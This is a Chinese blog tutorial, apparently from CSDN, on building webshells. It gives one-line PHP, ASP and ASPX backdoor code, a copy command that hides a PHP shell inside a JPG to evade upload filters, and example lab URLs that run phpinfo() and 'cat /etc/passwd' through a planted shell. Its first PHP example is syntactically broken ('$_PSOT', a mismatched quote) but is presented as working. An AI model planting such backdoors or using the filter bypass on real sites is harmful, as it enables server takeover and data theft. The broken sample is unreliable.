文件上传 webshell 各类型 一句话木马 图片马 制作 教程

本文详细介绍了Webshell的概念,包括asp、php、jsp和cgi等不同类型的Web后门,并展示了不同类型的PHP和ASP木马代码实例。解释了eval和system函数在创建木马中的作用,以及如何通过图片马绕过过滤。还讨论了使用中国菜刀等工具进行连接获取shell的方法,揭示了Webshell的原理和危害。
摘要由CSDN通过智能技术生成

webshell
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般时系统执行函数
大马:代码量和功能比小马多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到
图片马:一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。

php 文章后面有几种php木马实践

<?php @eval('$_PSOT['admin']);?>
<?php eval($_REQUEST['admin']);?>
<?php system($_REQUEST['admin']);?>

asp

<%eval request ("admin")%>

aspx

<%@ Page Language="Jscript"%> <%eval(Request.Item["admin"],"unsafe");%>

原理:
以 php 的一句话木马为例,<?php @eval('$_PSOT['admin']);?> 语句能作为木马,其原理是利用 php 中的 eval 函数,将传入的任何语句作为 php 语句执行,因此当传入该木马时,通过访问该文件,以 post 方式传入参数,eval 函数再将接收的语句作为 php 语句执行,这就构成了连接。
其中admin是一个变量名,用来接收语句,也可以称之为密码。
@ 在php中的作用是抑制错误提示。
例如:加入已植入该木马,使用 POST 方式接收参数 phpinfo(),再通过 eval 将其作为php语句执行,就查看了站点的 php 信息。

图片马
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
使用语句 生成图片马:

copy 图片.jpg/b + 木马.php/a 木马.jpg

/b 表示以二进制方式打开
/a 表示以ASCII方式打

介绍php的几种
shell.php 使用php函数 菜刀连接
<?php @eval('$_PSOT['admin']);?>
在这里插入图片描述

在这里插入图片描述

shell2.php #eveal 使用php函数,例如phpinfo();
<?php eval($_REQUEST['admin']);?>
http://192.168.0.7/dvwa/hackable/uploads/shell.php?admin=phpinfo();
在这里插入图片描述
**
post是想用中国菜刀之类的工具连接获取shell,是C/S架构。
request是在网页端输入变量访问**

shell3.php #systeam使用linux系统命令,例如ls,cat,rm,cp
<?php system($_REQUEST['admin']);?>
http://192.168.8.134/dvwa/hackable/uploads/shell3.php?yangge=cat /etc/passwd
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值